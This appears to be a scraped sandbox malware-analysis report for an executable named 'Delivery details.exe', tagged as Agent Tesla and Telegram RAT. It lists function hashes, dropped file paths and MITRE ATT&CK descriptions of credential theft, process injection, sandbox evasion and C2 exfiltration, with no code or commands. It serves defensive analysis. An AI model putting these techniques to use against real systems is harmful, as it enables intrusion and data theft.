Opcode ID: 38aad2a3fe8b96b729873c9de0ede632ea199e924719a9a3178e1a0128fd3d5d
Instruction ID: d2480c660f3b1b1b8bddf440365770ec163fefb924db368b813fc7d734dee3e0
Opcode Fuzzy Hash: 38aad2a3fe8b96b729873c9de0ede632ea199e924719a9a3178e1a0128fd3d5d
Instruction Fuzzy Hash: 7E1124B1C106599FCB10CF9AC585BDEFBF4AF48310F14816AE914A7240D778A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02A8E168 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,02A8EA52), ref: 02A8EB3F

Memory Dump Source

Source File: 00000006.00000002.3266100788.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2a80000_wab.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 102a619de16223177caf6c6cca0dff31321240ae8eb691e2f4e8e9646cf87103
Instruction ID: c8480b64d775c00497c67caaa6efe9129f75dbb64fdfbf97760440687bf007b5
Opcode Fuzzy Hash: 102a619de16223177caf6c6cca0dff31321240ae8eb691e2f4e8e9646cf87103
Instruction Fuzzy Hash: E21133B1D00659DBCB10DF9AC544B9EFBF4EF48320F14816AE918B7240D778A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02A5D20C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3265885922.0000000002A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2a5d000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27f6b27b6731e7cbac2b0739d020570b7be09b0285b219596792685815c0ff7d
Instruction ID: 39de5e67c83b7a1bebbf1dab45d8df7729b26771abd47766bfdccaaab10d15f9
Opcode Fuzzy Hash: 27f6b27b6731e7cbac2b0739d020570b7be09b0285b219596792685815c0ff7d
Instruction Fuzzy Hash: CF2123B1604644EFDB01DF14D9C4B2BFB65FB84324F24CA69EC491B246C77AD806CA62

Uniqueness

Uniqueness Score: -1.00%

Function 02A5D3BC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3265885922.0000000002A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2a5d000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffc3f8b229e3324c71b4dc5ecaf354257dbfbdf382ba32f0d1c102fbbc46c594
Instruction ID: 4c6b6471c8aa86de4ed4378ad450cb30fc88104e131a81a4770f6606cd37a336
Opcode Fuzzy Hash: ffc3f8b229e3324c71b4dc5ecaf354257dbfbdf382ba32f0d1c102fbbc46c594
Instruction Fuzzy Hash: 7F21F5B5504604DFDB09DF14D5C0B27BB75FB84324F24C96DDC094B246C776E846CA61

Uniqueness

Uniqueness Score: -1.00%

Function 02A5D207 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3265885922.0000000002A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2a5d000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e06d98b3feba62a46d8fc52e8bedceffe53e2ddd6c7fe4d98e50ab0f081ae8e
Instruction ID: 25df1a494121fed71c052b7bc4a9fd72e69683b60dee7213636f71c42c5e8c11
Opcode Fuzzy Hash: 1e06d98b3feba62a46d8fc52e8bedceffe53e2ddd6c7fe4d98e50ab0f081ae8e
Instruction Fuzzy Hash: 2311C176504684CFDB12CF14D5C4B1AFF61FB84324F24C6AADC494B646C37AD40ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02A5D3B7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3265885922.0000000002A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2a5d000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bd4318166a5511db8e532d5d06596f6694e76da0c7d38603b81d7949cefb112
Instruction ID: 02db69678820a308f908ee7e54617aee9d6bf3a051cddb2e0ca3c27706d44466
Opcode Fuzzy Hash: 8bd4318166a5511db8e532d5d06596f6694e76da0c7d38603b81d7949cefb112
Instruction Fuzzy Hash: B5119D75504680DFDB06CF24D5C4B16BBB2FB85314F24C6AEDC494B656C33AE84ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02A5D03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3265885922.0000000002A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2a5d000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bd4318166a5511db8e532d5d06596f6694e76da0c7d38603b81d7949cefb112
Instruction ID: aa1c75a3ef8eb54291dc69859b0fb8bb422c88a64064b421abe04e804e70d46a
Opcode Fuzzy Hash: 8bd4318166a5511db8e532d5d06596f6694e76da0c7d38603b81d7949cefb112
Instruction Fuzzy Hash: AA11BB75504684CFCB12CF10D9C4B16BBA2FB88314F24C6ADDC494B256C73AD84ACF62

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Delivery details.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g4ruvxfh.hvl.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_syd1s2il.wy3.ps1

C:\Users\user\AppData\Local\Temp\nst7F0C.tmp

C:\Users\user\AppData\Roaming\akroterion\archmugwump\Kbslaaende.Fri

C:\Users\user\AppData\Roaming\akroterion\archmugwump\Kraevet\Haematopoiesis\Depressingness.pan

C:\Users\user\AppData\Roaming\akroterion\archmugwump\Kraevet\Haematopoiesis\Gynodioeciously.hjr

C:\Users\user\AppData\Roaming\akroterion\archmugwump\Lndeles.Joh

C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured\Delivery details.exe

C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured\Delivery details.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured\Midlines.txt

C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured\brandmur.pha

C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured\nozzle.par

Windows Analysis Report
Delivery details.exe

Function 00403489 Relevance: 87.9, APIs: 33, Strings: 17, Instructions: 412
stringfilecomCOMMON

Function 00405553 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Function 00405ABE Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 00406ABA Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Function 00403E6C Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Function 00403ABE Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402F14 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Function 004063D2 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre